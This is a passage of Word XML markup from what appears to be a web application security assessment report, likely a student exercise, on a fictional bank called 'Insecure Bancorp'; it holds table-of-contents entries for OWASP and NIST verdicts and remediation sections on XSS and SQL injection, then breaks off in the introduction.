          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc46402730 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>10</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2516D565"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31" w:history="1">
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>5.5</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="000D2342">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
            <w:smallCaps w:val="0"/>
            <w:noProof/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Web Server NIST Verification Requirements</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc46402731 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>10</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="78053B6F" w14:textId="77777777" w:rsidR="00F63A7E" w:rsidRPr="000D2342" w:rsidRDefault="009A5BBA">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="400"/>
          <w:tab w:val="right" w:leader="dot" w:pos="8630"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc46402732" w:history="1">
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>6</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="000D2342">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:noProof/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Recommended Remediation Actions</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc46402732 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>11</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7BC616EB"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33" w:history="1">
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>6.1</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="000D2342">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
            <w:smallCaps w:val="0"/>
            <w:noProof/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Web Application Recommendations - XSS</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc46402733 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>11</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="796A307A"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34" w:history="1">
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>6.2</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="000D2342">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
            <w:smallCaps w:val="0"/>
            <w:noProof/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Web Application Recommendations - Sensitive Data Exposure</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc46402734 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>12</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="79D2A2F1"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35" w:history="1">
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>6.3</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="000D2342">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
            <w:smallCaps w:val="0"/>
            <w:noProof/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Web Application Recommendations - SQL Injections</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc46402735 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>12</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="20C1E3AD"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36" w:history="1">
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>6.4</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="000D2342">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
            <w:smallCaps w:val="0"/>
            <w:noProof/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Web Application Recommendations – Components With Known Vulnerabilities</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc46402736 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>13</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="49481B85"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37" w:history="1">
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>6.5</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="000D2342">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
            <w:smallCaps w:val="0"/>
            <w:noProof/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Other Web Recommendations</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc46402737 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>13</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6E549594" w14:textId="77777777" w:rsidR="00F63A7E" w:rsidRPr="000D2342" w:rsidRDefault="009A5BBA">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="800"/>
          <w:tab w:val="right" w:leader="dot" w:pos="8630"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc46402738" w:history="1">
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>6.6</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="000D2342">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
            <w:smallCaps w:val="0"/>
            <w:noProof/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Biblical Integration Results</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc46402738 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>14</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3DFB4DEB" w14:textId="77777777" w:rsidR="00F63A7E" w:rsidRPr="000D2342" w:rsidRDefault="009A5BBA">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8630"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc46402739" w:history="1">
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Appendix – Security Requirement Pass/Fail Verdicts</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc46402739 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>15</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6CE913A6" w14:textId="77777777" w:rsidR="00F63A7E" w:rsidRPr="000D2342" w:rsidRDefault="009A5BBA">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8630"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc46402740" w:history="1">
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>OWASP Level 1A Pass/Fail Verdicts</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc46402740 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>15</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="44A3BAFE" w14:textId="77777777" w:rsidR="00F63A7E" w:rsidRPr="000D2342" w:rsidRDefault="009A5BBA">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8630"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc46402741" w:history="1">
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>OWASP  Level 1B Pass/Fail Verdicts</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc46402741 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>17</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="58498D7F" w14:textId="77777777" w:rsidR="00F63A7E" w:rsidRPr="000D2342" w:rsidRDefault="009A5BBA">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8630"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc46402742" w:history="1">
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Web Server NIST Pass/Fail Verdicts</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc46402742 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>18</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="18C61835" w14:textId="77777777" w:rsidR="0052380C" w:rsidRDefault="002E4258" w:rsidP="00E444A5">
      <w:pPr>
        <w:sectPr w:rsidR="0052380C" w:rsidSect="0052380C">
          <w:headerReference w:type="default" r:id="rId11"/>
          <w:footerReference w:type="default" r:id="rId12"/>
          <w:pgSz w:w="12240" w:h="15840" w:code="1"/>
          <w:pgMar w:top="1440" w:right="1800" w:bottom="1440" w:left="1800" w:header="720" w:footer="720" w:gutter="0"/>
          <w:pgNumType w:fmt="lowerRoman"/>
          <w:cols w:space="720"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C3BA03" w14:textId="77777777" w:rsidR="003775DD" w:rsidRPr="003775DD" w:rsidRDefault="003775DD" w:rsidP="003775DD"/>
    <w:p w14:paraId="3DC3BB6A" w14:textId="77777777" w:rsidR="002E4258" w:rsidRDefault="007D3687" w:rsidP="002E4258">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc46402701"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Assessment </w:t>
      </w:r>
      <w:r w:rsidR="002E4258">
        <w:t>Introduction</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="18F99F70" w14:textId="77777777" w:rsidR="0060698B" w:rsidRDefault="0060698B" w:rsidP="0052181F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46690046" w14:textId="275A7F33" w:rsidR="00AE65EE" w:rsidRPr="00A06141" w:rsidRDefault="000B0D89" w:rsidP="00A06141">
      <w:pPr>
        <w:ind w:firstLine="432"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A06141">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Insecure Bancorp is a regional bank that offers an online platform to all business and </w:t>
      </w:r>
      <w:r w:rsidR="003A7D7F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>day to day</w:t>
      </w:r>
      <w:r w:rsidRPr="00A06141">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> customers. In recent months Insecure </w:t>
      </w:r>
